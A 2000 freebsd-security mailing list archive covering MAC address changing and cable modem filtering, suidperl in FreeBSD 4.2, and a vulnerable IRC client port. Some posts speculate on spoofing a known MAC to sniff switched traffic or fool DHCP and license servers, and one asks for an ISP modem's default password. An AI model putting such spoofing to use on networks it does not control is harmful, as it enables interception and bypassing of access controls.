(cc721767-a.hwrd1.md.home.com [24.180.128.61]) by hub.freebsd.org (Postfix) with ESMTP id 4253637B400 for ; Mon, 11 Dec 2000 04:57:57 -0800 (PST) Received: from galifrey (dyn4 [192.168.2.204]) by master.mddsg.com (8.9.3/8.9.3) with SMTP id HAA26537; Mon, 11 Dec 2000 07:57:45 -0500 (EST) (envelope-from erickson@mddsg.com) Message-ID: <001001c06371$ece41a00$cc02a8c0@columbia.mentis.org> From: "David Erickson" To: "Jeff Fulton" , "Roman Shterenzon" Cc: References: <020401c06370$1ca77f40$2001a8c0@amoeba> Subject: Re: MAC Address Date: Mon, 11 Dec 2000 07:57:32 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On a cisco switch the proper way to get around that would be to have the original and it's duplicate on a spanning ports for eachother that way the switch wouldn't care it would always send the packets to both ports and only one would respond at any given time. But Fortunately i dont have to worry about that because i have a stupid Netgear switch at home which really seems to not care what i do mac address wise. It picks up on the changes almost instantly. Dave ----- Original Message ----- From: "Jeff Fulton" To: "Roman Shterenzon" ; "David Erickson" Cc: Sent: Monday, December 11, 2000 7:44 AM Subject: Re: MAC Address > The switch learns your location when it processes a packet sent by you. > Once you're in the station cache, you'll get timed out if you don't send > anything for a minute or two. If a rogue duplicate sends something, the > station cache will be modified to point to him. Of course, it may change > straight back if the real owner transmits something again. > > I don't think both the rogue and the duplicate can be in the station cache > at the same time. > > Regards, > jeff Fulton > > > > ----- Original Message ----- > From: "Roman Shterenzon" > To: "David Erickson" > Cc: > Sent: Monday, December 11, 2000 6:16 PM > Subject: Re: MAC Address > > > > On Mon, 11 Dec 2000, David Erickson wrote: > > > > > > Sounds to me all this is just_slightly_unethical_if > > > > _not_bordering_on_illegal. This is a topic for a security mailing > list? > > > > I thought we were here to boost network security, not circumvent it. > > > > Just a network technician's opinion. > > > > > > How is it unethical to change ones MAC address? First of all a MAC > address > > > is only used on your local LAN segment. MAC Addresses do not traverse > over > > > IP. Once your traffic hits a router the traffic is then relayed. ARP > is > > > > The most interesting question is if I know some mac address on a switched > > network and then I set my mac address to this address, if some switches > > _will_ deliver packets to me as well? It might be interesting sniffing > > strategy on a switched network if some switches work this way. > > Thoughts? > > > > --Roman Shterenzon, UNIX System Administrator and Consultant > > [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 5: 9:33 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 05:09:26 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mail.rdc2.pa.home.com (ha2.rdc2.pa.home.com [24.12.106.195]) by hub.freebsd.org (Postfix) with ESMTP id 3AA5E37B400 for ; Mon, 11 Dec 2000 05:09:24 -0800 (PST) Received: from mail.rdc1.pa.home.com ([24.7.112.46]) by mail.rdc2.pa.home.com (InterMail vM.4.01.03.00 201-229-121) with SMTP id <20001211130923.EFHH28208.mail.rdc2.pa.home.com@mail.rdc1.pa.home.com>; Mon, 11 Dec 2000 05:09:23 -0800 Date: Mon, 11 Dec 2000 08:09:21 +0000 From: Moses Backman III To: hvb@dsms.com Cc: "freebsd-security @ FreeBSD . ORG" Subject: Re: RCA cable modem Message-ID: <20001211080921.A1211@cg22413-a.adubn1.nj.home.com> References: <3A3489D4.100E8B41@dsms.com> Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit In-Reply-To: <3A3489D4.100E8B41@dsms.com>; from hvb@dsms.com on Mon, Dec 11, 2000 at 08:01:24 +0000 X-Mailer: Balsa 1.0.0 Content-Length: 1540 Lines: 39 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 2000.12.11 08:01:24 +0000 harold barker wrote: > > Anyone care to share the default ip address and password that @home uses > for > the RCA modems. I am looking to grab the stats, so that i can help the > clue > less tech when mine does down. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > it always amazes me at how much people think they know about cable modems. net stats beyond packet loss to the gateway won't help the "clueless tech" what will help though is if you look at the lower channels on your tv when your modem goes down. i'm not sure what system you're in in, but here we read noise, forward level, and reverse power levels with a laptop and a 3com test modem. the rca's will show you shit. if you are like 90% of the persistent service calls i work, you are the victim of bad R/F. net stats would probably help if you were the only one fed from that chassis, but if everyone else is not experiencing the same problem you are, well .................................................................................................. so, grab your field strength meter and measure the forward level then grab your comb generator and measure your loss back to the tap. get a signal-to-noise sampling and then make sure your fittings and splitter (notice it's not plural) are in good condition. then you'll be helping the clueless tech. if you think you can ignore topology with a cable modem, you should really think again To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 7:15:41 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 07:15:38 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mail.monmouth.com (mail.monmouth.com [209.191.58.1]) by hub.freebsd.org (Postfix) with ESMTP id 4D78837B400 for ; Mon, 11 Dec 2000 07:15:38 -0800 (PST) Received: from bg-tc-ppp975.monmouth.com (bg-tc-ppp975.monmouth.com [209.191.51.163]) by mail.monmouth.com (8.9.3/8.9.3) with ESMTP id KAA21948 for ; Mon, 11 Dec 2000 10:15:31 -0500 (EST) Received: (from pechter@localhost) by bg-tc-ppp975.monmouth.com (8.11.1/8.9.3) id eBBFFR212066 for security@FreeBSD.ORG; Mon, 11 Dec 2000 10:15:27 -0500 (EST) (envelope-from pechter) From: Bill Pechter Message-Id: <200012111515.eBBFFR212066@bg-tc-ppp975.monmouth.com> Subject: Re: MAC Address change In-Reply-To: from security-digest at "Dec 11, 2000 04:44:26 am" To: security@FreeBSD.ORG Date: Mon, 11 Dec 2000 10:15:27 -0500 (EST) Reply-To: bpechter@shell.monmouth.com X-Phone-Number: 732-935-0629 X-OS-Type: FreeBSD 4.0-CURRENT X-Mailer: ELM [version 2.4ME+ PL66 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: pechter@bg-tc-ppp975.monmouth.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > From: "Will Mitayai Keeso Rowe" > > To: "David Erickson" > > Cc: > > Sent: Monday, December 11, 2000 3:08 PM > > Subject: Re: MAC Address > > > > > > > Dave, > > > > > > I'm sure you could work it out, but i'm curious as why you would want > > > to do this? A MAC address provides a necessary function in it's > sequences > > > of set prefixes and it's sequence of unique suffixes. > > > > > > -Mit > > > Also, certain protocols also tinker with the MAC address -- for example DECnet -- which I believe uses part of the DECnet area number in your MAC address for routing. I'll be looking into the DECnet further when I get my Vax running and Linux DECnet talking to it. --Bill -- bpechter@monmouth.com | FreeBSD since 1.0.2, Linux since 0.99.10 | Unix Sys Admin since Sys V/BSD 4.2 | Windows System Administration: "Magical Misery Tour" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 7:26:45 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 07:26:41 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from castle.dreaming.org (castle.dreaming.org [209.146.217.193]) by hub.freebsd.org (Postfix) with ESMTP id 5722637B400 for ; Mon, 11 Dec 2000 07:26:41 -0800 (PST) Received: from mitayai3 (cr592943-a.bloor1.on.wave.home.com [24.156.38.199]) by castle.dreaming.org (8.11.1/8.11.1) with SMTP id eBBFQNX76092; Mon, 11 Dec 2000 10:26:23 -0500 (EST) (envelope-from mitayai@mitayai.net) From: "Will Mitayai Keeso Rowe" To: "David Erickson" , "Jeff Fulton" , "Will Mitayai Keeso Rowe" Cc: Subject: RE: MAC Address Date: Mon, 11 Dec 2000 10:26:20 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <001801c06334$3bcfd7a0$cc02a8c0@columbia.mentis.org> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org try turning off your cable modem for 10 minutes while you switch machines. Perhaps the lease just has to timeout/expire. -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of David Erickson Sent: December 11, 2000 00:36 AM To: Jeff Fulton; Will Mitayai Keeso Rowe Cc: freebsd-security@FreeBSD.ORG Subject: Re: MAC Address Exactly My cablemodem can be moved to another machine by reseting it. But once communication has started with that MAC address it will not listen. Implementing VRRP wont do what I want because it still see the MAC address of the primary machines nic not the vrrp mac address. But Im trying to put in place a little redundancy and the only way I can come up with is by monitoring on a seperate ethernet crossover between machines and when it stops responding to traffic over that link then I would assume the other machines MAC address. Similar to VRRP with the VRRP mac address being shared between multiple machines but only one machine using it at a time as the gateway. Dave ----- Original Message ----- From: "Jeff Fulton" To: "Will Mitayai Keeso Rowe" ; "David Erickson" Cc: Sent: Sunday, December 10, 2000 11:27 PM Subject: Re: MAC Address > Maybe to masquerade as another address to fool a dhcp server or even a > license server. > Some of the cable networks register your mac address and won't allow you to > connect from a different address, unless you call them up and ask to get it > changed. > There have also been a few nasty manufacturing events over the years when a > whole batch of cards got sent out all with identical mac addresses. > > Regards, > Jeff Fulton > > > ----- Original Message ----- > From: "Will Mitayai Keeso Rowe" > To: "David Erickson" > Cc: > Sent: Monday, December 11, 2000 3:08 PM > Subject: Re: MAC Address > > > > Dave, > > > > I'm sure you could work it out, but i'm curious as why you would want > > to do this? A MAC address provides a necessary function in it's sequences > > of set prefixes and it's sequence of unique suffixes. > > > > -Mit > > > > > > --- > > Will Mitayai Keeso Rowe > > Toronto, Ontario, Canada > > mitayai@dreaming.org > > > > On Sun, 10 Dec 2000, David Erickson wrote: > > > > > Is it possible to change the MAC address on a NIC through ifconfig or > any > > > other means or do I have to get a specific NIC that supports this > > > functionality? > > > > > > Dave Erickson > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 7:51:26 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 07:51:23 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 69F8337B400 for ; Mon, 11 Dec 2000 07:51:23 -0800 (PST) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.11.1/8.11.1) with SMTP id eBBFoue42596; Mon, 11 Dec 2000 10:50:56 -0500 (EST) (envelope-from robert@fledge.watson.org) Date: Mon, 11 Dec 2000 10:50:56 -0500 (EST) From: Robert Watson X-Sender: robert@fledge.watson.org To: Will Mitayai Keeso Rowe Cc: David Erickson , freebsd-security@FreeBSD.ORG Subject: Re: MAC Address In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: robert@fledge.watson.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 10 Dec 2000, Will Mitayai Keeso Rowe wrote: > I'm sure you could work it out, but i'm curious as why you would want to > do this? A MAC address provides a necessary function in it's sequences > of set prefixes and it's sequence of unique suffixes. While apparently it's not the aim of the person asking, there are a lot of practical benefits to being able to change the MAC address on a device. This functionality can be used in (both manual and automatic) fail-over situations with bad/lost/stolen cards, in the presence of centrally administered DHCP and bootp services that don't adapt rapidly (or at all) to changing MAC addresses, etc. Robert N M Watson FreeBSD Core Team, TrustedBSD Project robert@fledge.watson.org NAI Labs, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 10:51:43 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 10:51:41 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 7DB2337B698 for ; Mon, 11 Dec 2000 10:51:40 -0800 (PST) Received: from localhost (arr@localhost) by fledge.watson.org (8.11.1/8.11.1) with SMTP id eBBIpch45252; Mon, 11 Dec 2000 13:51:38 -0500 (EST) (envelope-from arr@watson.org) Date: Mon, 11 Dec 2000 13:51:38 -0500 (EST) From: "Andrew R. Reiter" To: David Erickson Cc: freebsd-security@FreeBSD.ORG Subject: Re: MAC Address In-Reply-To: <000701c06315$84e46ec0$cc02a8c0@columbia.mentis.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I thought one could change this with some forth code On Sun, 10 Dec 2000, David Erickson wrote: > Is it possible to change the MAC address on a NIC through ifconfig or any > other means or do I have to get a specific NIC that supports this > functionality? > > Dave Erickson > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > *-------------................................................. | Andrew R. Reiter | arr@fledge.watson.org | "It requires a very unusual mind | to undertake the analysis of the obvious" -- A.N. Whitehead To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 12:50:44 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 12:50:42 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id BFEE637B400 for ; Mon, 11 Dec 2000 12:50:40 -0800 (PST) Received: from [127.0.0.1] (helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 145Zxl-0000D0-00 for freebsd-security@freebsd.org; Mon, 11 Dec 2000 13:54:21 -0700 Sender: wes@FreeBSD.ORG Message-ID: <3A353EFC.C36F95AA@softweyr.com> Date: Mon, 11 Dec 2000 13:54:20 -0700 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Re: DHCP beats MAC Address References: <01ee01c0632a$bdffad40$9214a8c0@plasmo> <001801c06334$3bcfd7a0$cc02a8c0@columbia.mentis.org> <001201c06336$aecd5550$aa240018@cx443070b> <20001211005915.D9158@pir.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Peter Radcliffe wrote: > > Jeremiah Gowdy probably said: > > Indeed, the cable modem does remember your MAC address, HOWEVER, rather than > > resetting it, if you use DHCP, and you're using one of the services like > > @Home that has an account number for the address, like CX13245125-A, then > > the second computer to DHCP with the account number gets the address without > > Every cable modem I've seen in the US, although I have not seen the > @home ones, filters on MAC addresses and only allows N through (where > N is normally one or you pay for more). The cable modem lets through > the first N MAC addresses it sees. > > In this case you have no choice but to reset the modem or change the > MAC address. Or use a NAT router. FreeBSD works admirably. ;^) -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 14:29:43 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 14:29:42 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from expert.com.br (soure.expert.com.br [200.242.253.1]) by hub.freebsd.org (Postfix) with SMTP id EC1A937B400 for ; Mon, 11 Dec 2000 14:29:40 -0800 (PST) Received: (qmail 3903 invoked from network); 11 Dec 2000 22:26:51 -0000 Received: from unknown (HELO nirvana) (200.242.253.60) by soure.expert.com.br with SMTP; 11 Dec 2000 22:26:51 -0000 Message-ID: <000901c063c1$d5b809e0$3cfdf2c8@nirvana> From: "Roberto Samarone Araujo (RSA)" To: Subject: FreeBSD 4.2 and Suid files Date: Mon, 11 Dec 2000 19:29:31 -0300 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.3018.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I have some suid perl scripts that was working fine on my FreeBSD 3.5. When I took them to my new freebsd 4.2 box, they stopped to work. When I try to execute them, the system show the message: "Can't do setuid" The FreeBSD 4.2 block suid files to work ? If so, how can I disable it ? thanks, Roberto Samarone Araujo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 14:39: 9 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 14:39:08 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id 1B86837B402 for ; Mon, 11 Dec 2000 14:39:07 -0800 (PST) Received: by peitho.fxp.org (Postfix, from userid 1501) id 19D9F13612; Mon, 11 Dec 2000 17:39:09 -0500 (EST) Date: Mon, 11 Dec 2000 17:39:08 -0500 From: Chris Faulhaber To: "Roberto Samarone Araujo (RSA)" Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD 4.2 and Suid files Message-ID: <20001211173908.A77758@peitho.fxp.org> Mail-Followup-To: Chris Faulhaber , "Roberto Samarone Araujo (RSA)" , freebsd-security@FreeBSD.ORG References: <000901c063c1$d5b809e0$3cfdf2c8@nirvana> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <000901c063c1$d5b809e0$3cfdf2c8@nirvana>; from sama@supridad.com.br on Mon, Dec 11, 2000 at 07:29:31PM -0300 Sender: cdf.lists@fxp.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Dec 11, 2000 at 07:29:31PM -0300, Roberto Samarone Araujo (RSA) wrote: > Hi, > > I have some suid perl scripts that was working fine on my FreeBSD > 3.5. When I took them to my new freebsd 4.2 box, they stopped to work. When > I try to execute them, the system show the message: "Can't do setuid" > The FreeBSD 4.2 block suid files to work ? If so, how can I disable > it ? > /usr/bin/suidperl is no longer suid by default (see mailing list archives for the discussions). You will need to manually set its permissions and/or add 'ENABLE_SUIDPERL=true' in /etc/make.conf and rebuild the system. -- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 14:46:27 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 14:46:22 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from stud.alakhawayn.ma (stud.alakhawayn.ma [193.194.63.94]) by hub.freebsd.org (Postfix) with ESMTP id 50F9937B698 for ; Mon, 11 Dec 2000 14:46:16 -0800 (PST) Received: from localhost (961BE653994@localhost) by stud.alakhawayn.ma (8.9.0/8.9.0) with SMTP id WAA24962; Mon, 11 Dec 2000 22:39:05 GMT Date: Mon, 11 Dec 2000 22:38:48 +0000 (GMT) From: ALAOUI EL HASSANI ALI <961BE653994@stud.alakhawayn.ma> To: Chris Faulhaber Cc: "Roberto Samarone Araujo (RSA)" , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD 4.2 and Suid files In-Reply-To: <20001211173908.A77758@peitho.fxp.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org to rebuild your System you should do : cd /usr/src/sys/i386/conf cp GENERIC newkernel /usr/sbin/config newkernel cd ../../compile/newkernel make depend make make install On Mon, 11 Dec 2000, Chris Faulhaber wrote: > On Mon, Dec 11, 2000 at 07:29:31PM -0300, Roberto Samarone Araujo (RSA) wrote: > > Hi, > > > > I have some suid perl scripts that was working fine on my FreeBSD > > 3.5. When I took them to my new freebsd 4.2 box, they stopped to work. When > > I try to execute them, the system show the message: "Can't do setuid" > > The FreeBSD 4.2 block suid files to work ? If so, how can I disable > > it ? > > > > /usr/bin/suidperl is no longer suid by default (see mailing list archives > for the discussions). You will need to manually set its permissions and/or > add 'ENABLE_SUIDPERL=true' in /etc/make.conf and rebuild the system. > > -- > Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org > -------------------------------------------------------- > FreeBSD: The Power To Serve - http://www.FreeBSD.org > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 14:47:43 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 14:47:40 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id DD57F37B698 for ; Mon, 11 Dec 2000 14:47:39 -0800 (PST) Received: by peitho.fxp.org (Postfix, from userid 1000) id E625A13612; Mon, 11 Dec 2000 17:47:42 -0500 (EST) Date: Mon, 11 Dec 2000 17:47:42 -0500 From: Chris Faulhaber To: ALAOUI EL HASSANI ALI <961BE653994@stud.alakhawayn.ma> Cc: "Roberto Samarone Araujo (RSA)" , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD 4.2 and Suid files Message-ID: <20001211174742.A34231@peitho.fxp.org> Mail-Followup-To: Chris Faulhaber , ALAOUI EL HASSANI ALI <961BE653994@stud.alakhawayn.ma>, "Roberto Samarone Araujo (RSA)" , freebsd-security@FreeBSD.ORG References: <20001211173908.A77758@peitho.fxp.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from 961BE653994@stud.alakhawayn.ma on Mon, Dec 11, 2000 at 10:38:48PM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Dec 11, 2000 at 10:38:48PM +0000, ALAOUI EL HASSANI ALI wrote: > to rebuild your System you should > do : > > cd /usr/src/sys/i386/conf > cp GENERIC newkernel > /usr/sbin/config newkernel > cd ../../compile/newkernel > make depend > make > make install > No, that rebuilds your kernel, not perl. -- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 14:50: 0 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 14:49:57 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from stud.alakhawayn.ma (stud.alakhawayn.ma [193.194.63.94]) by hub.freebsd.org (Postfix) with ESMTP id B15FB37B400 for ; Mon, 11 Dec 2000 14:49:54 -0800 (PST) Received: from localhost (961BE653994@localhost) by stud.alakhawayn.ma (8.9.0/8.9.0) with SMTP id WAA25034; Mon, 11 Dec 2000 22:43:29 GMT Date: Mon, 11 Dec 2000 22:43:28 +0000 (GMT) From: ALAOUI EL HASSANI ALI <961BE653994@stud.alakhawayn.ma> To: Chris Faulhaber Cc: "Roberto Samarone Araujo (RSA)" , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD 4.2 and Suid files In-Reply-To: <20001211174742.A34231@peitho.fxp.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ah I see Thankx for that Sorry if I was confusing On Mon, 11 Dec 2000, Chris Faulhaber wrote: > On Mon, Dec 11, 2000 at 10:38:48PM +0000, ALAOUI EL HASSANI ALI wrote: > > to rebuild your System you should > > do : > > > > cd /usr/src/sys/i386/conf > > cp GENERIC newkernel > > /usr/sbin/config newkernel > > cd ../../compile/newkernel > > make depend > > make > > make install > > > > No, that rebuilds your kernel, not perl. > > -- > Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org > -------------------------------------------------------- > FreeBSD: The Power To Serve - http://www.FreeBSD.org > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 16:59:25 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 16:59:21 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from 214.norrgarden.se (unknown [195.100.133.214]) by hub.freebsd.org (Postfix) with ESMTP id E2B0037B699; Mon, 11 Dec 2000 16:59:18 -0800 (PST) Received: (from cj@localhost) by 214.norrgarden.se (8.11.1/8.11.1) id eBBHqEv00257; Mon, 11 Dec 2000 18:52:14 +0100 (CET) (envelope-from cj) Date: Mon, 11 Dec 2000 18:52:14 +0100 From: Carl Johan Madestrand To: Warner Losh Cc: sideshow@terahertz.net, security@freebsd.org, ports@freebsd.org Subject: Re: Bitchx marked forbidden Message-ID: <20001211185214.A194@214.norrgarden.se> References: <200012110709.AAA34560@harmony.village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200012110709.AAA34560@harmony.village.org>; from imp@village.org on Mon, Dec 11, 2000 at 12:09:03AM -0700 Sender: cj@214.norrgarden.se Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Dec 11, 2000 at 12:09:03AM -0700, Warner Losh wrote: > > Per Kris Kenneway's request, I've marked bitchx as forbidden due to > remotely exploitable buffer overflows that have been disclosed in > bugtraq. Please accept my appologies for any difficulties this may > cause. > > Thanks much. > > Warner > I will shortly submit an update to the BitchX port. There is now a patch available on ftp.bitchx.com. -- Carl Johan Madestrand LoRd_CJ on IRC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 17:30:27 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 17:30:25 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from expert.com.br (soure.expert.com.br [200.242.253.1]) by hub.freebsd.org (Postfix) with SMTP id 1341037B400 for ; Mon, 11 Dec 2000 17:30:24 -0800 (PST) Received: (qmail 10036 invoked from network); 12 Dec 2000 01:27:35 -0000 Received: from bxs20-1-p29.expert.com.br (HELO nirvana) (200.242.253.159) by soure.expert.com.br with SMTP; 12 Dec 2000 01:27:35 -0000 Message-ID: <008001c063db$14e00ff0$9ffdf2c8@nirvana> From: "Roberto Samarone Araujo (RSA)" To: References: <000901c063c1$d5b809e0$3cfdf2c8@nirvana> <20001211173908.A77758@peitho.fxp.org> Subject: Re: FreeBSD 4.2 and Suid files Date: Mon, 11 Dec 2000 22:30:14 -0300 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.3018.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > /usr/bin/suidperl is no longer suid by default (see mailing list archives > for the discussions). You will need to manually set its permissions and/or > add 'ENABLE_SUIDPERL=true' in /etc/make.conf and rebuild the system. > Ok, thanks ... but, are there any way to recompile only Perl ? thanks again, Roberto Samarone dos Santos Araujo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 18:21:58 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 18:21:56 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from citusc.usc.edu (citusc.usc.edu [128.125.38.123]) by hub.freebsd.org (Postfix) with ESMTP id 03E7537B402 for ; Mon, 11 Dec 2000 18:21:56 -0800 (PST) Received: (from kris@localhost) by citusc.usc.edu (8.9.3/8.9.3) id SAA01430; Mon, 11 Dec 2000 18:23:01 -0800 Date: Mon, 11 Dec 2000 18:23:01 -0800 From: kris@citusc.usc.edu To: "Roberto Samarone Araujo (RSA)" Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD 4.2 and Suid files Message-ID: 